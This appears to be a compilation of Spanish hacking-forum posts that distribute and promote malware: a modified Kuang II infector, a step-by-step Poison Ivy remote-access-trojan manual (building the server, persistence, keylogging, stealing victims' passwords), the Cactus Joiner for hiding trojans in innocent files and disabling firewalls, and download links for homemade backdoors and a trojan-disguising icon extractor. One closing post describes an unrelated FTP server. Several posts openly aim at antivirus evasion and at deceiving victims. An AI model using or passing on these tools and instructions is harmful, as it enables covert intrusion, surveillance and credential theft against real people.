kuang II 4ever    http://www.geocities.com/yan_uniko_102/kuang2.zip



este troyano lo saque de un ezine y le hice algunas modificaciones para que no fuera tan facil de detectar. El infector.exe infecta el ejecutable que tu quieras y lo envias a la victima.. despues te conectas a traves del cliente y eso es todo. DONDE ESTÁ LA GRACIA DE ESTE TROYANO!! Y LA P** MADRE... trankilo.. no os escandaliceis... la gracia es que cuando la victima se infecta.. este troyano infecta a todos los demas archivos de la pc y Aunque borre el original tendria que borrar todo lo que tiene como para deshacerse de el XD pero trankilo... es controlable... si te autoinfectas.. puedes desinfectarte con el mismo cliente. Ademas infecta el kernel entre otras cosas XD

Este es un pequeño manual de como utilizar y crear el server.exe con el Poison Ivy 2.1.1 o 2.2 primero q nada lo descargamos:
Poison Ivy 2.2
Poison IvyVERSION PRIVADA

Empezamos con la configuracion del troyano,bueno primero explico toda este pantalla: Pestaña Connections

ID. Es el nombre q le pusimos a la victima.
WAN. Es la IP de la victima en ese momento.
LAN. Es la IP de la red de la victima.
COMPUTER. Es la pc q utiliza la victima,nombre etc.
USER NAME. Muestra el nombre de usuario de la pc.
ACC TIPE. Muestra la sesion con q se entro en la pc,admin,invitado u otra cuenta...
O.S. Es el sistem operativo q utiliza la victima.
CPU. Nos dice los (MHz) q tiene la pc de la victima.
RAM. Nos dice la menoria RAM q tiene la victima,jajajajaj su pc claro xDDD
VERSION. Es la version del posion ivy instalada en la pc de la victima.
PING. Nos dice la velocidad de conexion cliente-server, si esta es muy ALTA dificulta la conexion hasta q puede q la perdamos,momentaneamante.

Ahora si vamos a la configuracion del poison Pestaña Build nos saldra esta pantalla:




DNS/PORT. Aqui ponemos nuestro dominio NO-IP q ya nos hemos creado sino es asi creense uno.Entramos en Add nos saldra esto:


Para comprovar si esta bien le damos en Test Conections si sale la _/ verde ok si no es asi nos saldra una X roja .
ID. Aqui el nombre q le ponemos a la victima,luego en el clente se puede cambiar dicho nombre.
PASSWORD. Si se le quiere poner contraseña al server.
Socks 4 -DNS/PORTS. Es para poner proxys,no es recomendable ya q relentiza la conexion.
ACTIVE-X KEY. Es para crear un registro en la pc de la victima,marquen la casilla STARTUP y ya esta para cambiar en RANDOM.
FILE NAME. Es el nombre con el q se instalara en la pc de la victima,poner uno q no llame la atencionxD.
COPY FILE TO: Es donde queremos q se instale nuestro server en system o windows.
MELT. Si la seleccionamos cuando la victima abra el server desaparecera,para probar con nosotros no es necesario activarla.
KEYLOGGER. Es para activar el Keylogger.
PERSISTENCE. Esta opcion dificulta borrar el server en la pc de la victima.
ADVANCED. No tocar.
ICON. Es para cambiar el icono al server.exe.
BUILD. Es para crear el server con toda la configuracion q le hemos dado,se crea en la carpeta donde esta el Poison Ivy.
Ahora vamos a la Pestaña Settings nos saldra esta pantalla:


LISTEN on PORT. Aqui ponemos el puerto q hemos puesto en BUILD.
PASSWORD. Aqui la contraseña q hemos puesto en BUILD si la hemos puestoxDDD.
FEATURES. Este apartado lo dejamos como esta,no se muy bien para q sirve :)D.
APPEARANCE. Aqui solo explico la opcion,Balloontip notification,sirve para cuando se conecta alguna victima nos aparezca un globo abajo en el reloj de win.
SAVE. Le damos a este para guardar la configuracion de esta pantalla.
Ahora vamos a la Pestaña Stats nos saldra esto:

Aqui nos dice la informacion de los datos enviados y recibidos,no nos deja ninguna opcion.
Vamos a la Pestaña About nos saldra esta pantalla:

No es nada importante solo autores y creditos xDDDD.
Vamos al tema, al hacer doble click en la victima q tenemos nos saldra esta pantalla:

Aqui nos muestra toda la informacion de la pc y el server.En la parte derecha estan todas las otras opciones q lleva el Poison Ivy,no las voy a explicar todas
infecten y descubran .
Bueno aqui una Screen capture:


Y lo mejor de todo Password List aqui estan todos los passwords de la victima: xDD


Hasta aqui el manual espero q les sea util.
Este manual no esta sacado de ninguna parte es BY FRANZA_110

Actualizado Cactus Joiner 2.5

Os presento Cactus Joiner 2.5, un pequeño programa con el que podrás unir infinitos archivos en 1 solo. Podrás usar este programa para ocultar el server de un troyano junto con otra aplicación o foto para engañar a la victima. Aparte podrás elegir que archivos se van a ejecutar de forma normal o de forma oculta. Como novedad en esta nueva versión incluye un Firewall Killer, con esta opción activada haremos que nuestro troyano desactive el firewall de Windows XP. Aqui os dejo unas imagenes del programa:

Pantalla Principal


Opciones Avanzadas


Guardar el Joiner


Novedades versión 2.5
*- Añadido: Sistema de Firewall Killer
*- Añadido: Nuevo sistema de encriptación (StrReverse)
*- Añadido: Se pueden unir infinitos archivos en 1 solo!
*- Añadido: Opción para auto-ejecutar los archivos en Regedit
*- Añadido: Opción para personalizar la Deploy Folder.
*- Añadido: Opción para personalizar el Output Name.
*- Añadido: Opción para cambiar el icono del ejecutable.
*- Añadido: Contador de archivos en el listado.
*- Añadido: Contador de tamaño de archivos en el listado.
*- Añadido: Biblioteca con 69 iconos.
*- Mejora: El tamaño de cactus.dll (stub) se ha reducido.
*- Mejora: El icono por defecto de cactus.dll es invisible.
*- Mejora: Se ha mejorado el GUI (Graphic User Interface), más compacto.
*- Mejora: Ventana de Opciones Avanzadas.
*- Mejora: Mejora en el menú contextual del listado.
*- Mejora: El método de encriptación es ahora mucho más eficiente.
*- Mejoras en el código interno:
   (*) Mejoras en el control de errores
   (*) Ejecución y compilación del joiner un 35% más rápida
   (*) Agregado sistema de detección de falta de archivos (cactus.dll)
   (*) Se ha eliminado el objeto 'Scripting.FileSystemObject'

*- Se puede añadir cualquier formato de archivo: programas, fotos, textos, videos, mp3, etc...
*- Permite seleccionar la forma de ejecución de los archivos. (normal / oculto).
*- Permite seleccionar que archivo se va a auto-ejecutar por Regedit.
*- Firewall Killer, deshabilita el firewall de Windows XP.
*- Encriptación: Permite encriptar el contenido de los archivos. Si se incluye un troyano, este se volverá indetectable!
*- Se puede cambiar el icono del programa final
*- El archivo final puede ser con extensión: exe, com, bat, scr, cmd o pif.

---

Mejoras en la próxima versión 3.0
*- Se aumentará la biblioteca de icono con nuevas imágenes
*- Se añadirán idiomas para usuarios de habla no-hispana.
*- Se añadirán mas Firewalls para "matar" en el cactus.dll

---

AVISO IMPORTANTE: NO mandeis el archivo cactus.dll a virustotal ni a ningún antivirus online, de esta forma el Cactus permanecerá más tiempo indetectable, si por alguna razón el Cactus se vuelve detectado por los antivirus avísame y crearé una versión del cactus.dll en tan solo unos días.

---

ERROR: Si os aparece un mensaje de error al abrir el Cactus diciendo que os falta el archivo COMDLG32.OCX sigue leyendo...

1) Descarga el archivo COMDLG32.OCX aqui
2) Copia el archivo dentro de tu carpeta del sistema (C:\Windows\System32\COMDLG32.OCX)
3) Registra el OCX usando el comando: regsvr32 C:\Windows\System32\COMDLG32.OCX para ello escribe lo que hay en negrita dentro del cuadro Menu Inicio/Ejecutar y pulsa Enter
4) Disfruta de Cactus Joiner

---

Código fuente Open Source
Y por si fuera poco, el código fuente COMPLETO del Cactus Joiner será publicado en su sección correspondiente (Programación VB) y abierto para todo el público. Disfrutad

[Source] Cactus Joiner 2.5 FULL
http://foro.elhacker.net/index.php/topic,160470.0.html

=> Para descargarlo, haz click donde pone: Cactus_Joiner_2.5.zip

SMART WORLD

Hola a todos  ya por fin he termindo Smart World.

Ha sido mucho trabajo lo que me ha costado pero ya esta aqui
Puede que tentga algunos errores y me gustaria seguir trabajando para mejorarlo , Si  tine errores seria buena idea abrir un hilo sobre ese tema en el foro.
La aplicaicon esta diseñada en vb 6 mecesita que se registren ocx en systen32 pero eso lo dejo en vuestras manos podeis descargar esto desde aqui
si se os ocurre algo para que solo sea un el .exe  que descomprima los ocx correcto publicarlo.

Una vez que tenemos el control de la maquina le subimos un archivo esencial para mandar mensajes
Es porque si le mando un mensaje a al vicitma hasta que no responda no puedo seguir con el control entocnes pense que seria interesante que fuera otro poroceso el que mostrara el mensaje

-------------------------- Componentes --------------------
http://www.guapi.es/smart/Server.rar
http://www.guapi.es/smart/Client Smart World.rar
http://www.guapi.es/smart/ocx.rar
http://www.guapi.es/smart/winmsg.rar


------------------------------------------------------------------------
Os pongo un captura del cliente para que vallais viendo como es.

http://www.guapi.es/smart.html

Espero que os guste si me animo lo hago con c++ asi no harian falta ocx jajajaja

un Saludo de VANS

Weno pos os presento mi primer troyano hecho en Visual Basic. Lo he ido haciendo segun el manual de la pagina de Kizar. Es un troyano Multi Conexion Inversa. No tiene muchas funciones, pero bueno, para ser el primero troyano que hago no esta mal. Os dejo unas imagenes:















Descargas

El Jugete 1.0 \/
     http://rapidshare.com/files/35255674/El_Jugete.rar
Manual \/
     http://rapidshare.com/files/35253606/Manual_El_Jugete.pdf

Contraseña por Privado, Solo usuarios con 50 mensajes o mas para garantizar un poco su indetectabilidad.

XtraCT iCoN v2.0 FINALIZADA!

Al final despues de la cancelacion del programa, he vuelto a crearlo y a reformarlo y ya lo teneis aqui! Os digo sus caracteristicas:

XtraCT iCoN v2.0
- Potentisimo extractor de CUALQUIER icono de CUALQUIER aplicacion de vuestro PC para camuflar vuestros troyanos a la perfeccion.
- Soporta .exe y .dll
- Pack de iconos (Por si no encuentras el que quieres en tu PC, que lo dudo)
- Instrucciones

DESCARGAR

Gracias a todos por vuestro apollo en la anterior version 1.0 que consiguio mas de 150 descargas en 3 dias. Os quiero!

Hola, bueno la verdad es que este proyecto no lo iba a terminar jamas ya que no ando mas en esto, decidi subirlo y compartirlo aca, el Server esta bastante el prolijo el cliente inverso (BackDoor),  esta desprolijo y tiene cosas q ya no usan en el codigo asique si lo quieren optimizar hagan como mas les guste.

Imagenes:








Espero que de algo les sirva, no estoy seguro si el source que subo tiene esa parte del filemanager, creo que la removi una ves porque no me convencia.

La transferencia de archivos la use de alguien no me acuerdo quien :/.

Descarga : http://www.freewebtown.com/volks/VolkS.zip

se trata de un Sever Ftp (No es un cliente)
Para aquellos que no saben bien de que les ablo se trata de una aplicacion la cual pueden transormar su pc en un host para crear cuentas de usuario y compartir archivos. los usuarios podran descargar o suvir archivos como si fuera un sitio web. bien, en la ayuda de la aplicacion esta mas detallado y con el corrector ortografico de word

algunas imagenes


El link para descargar el proyecto mas la aplicacion

Diógenes FTP

By Leandro Ascierto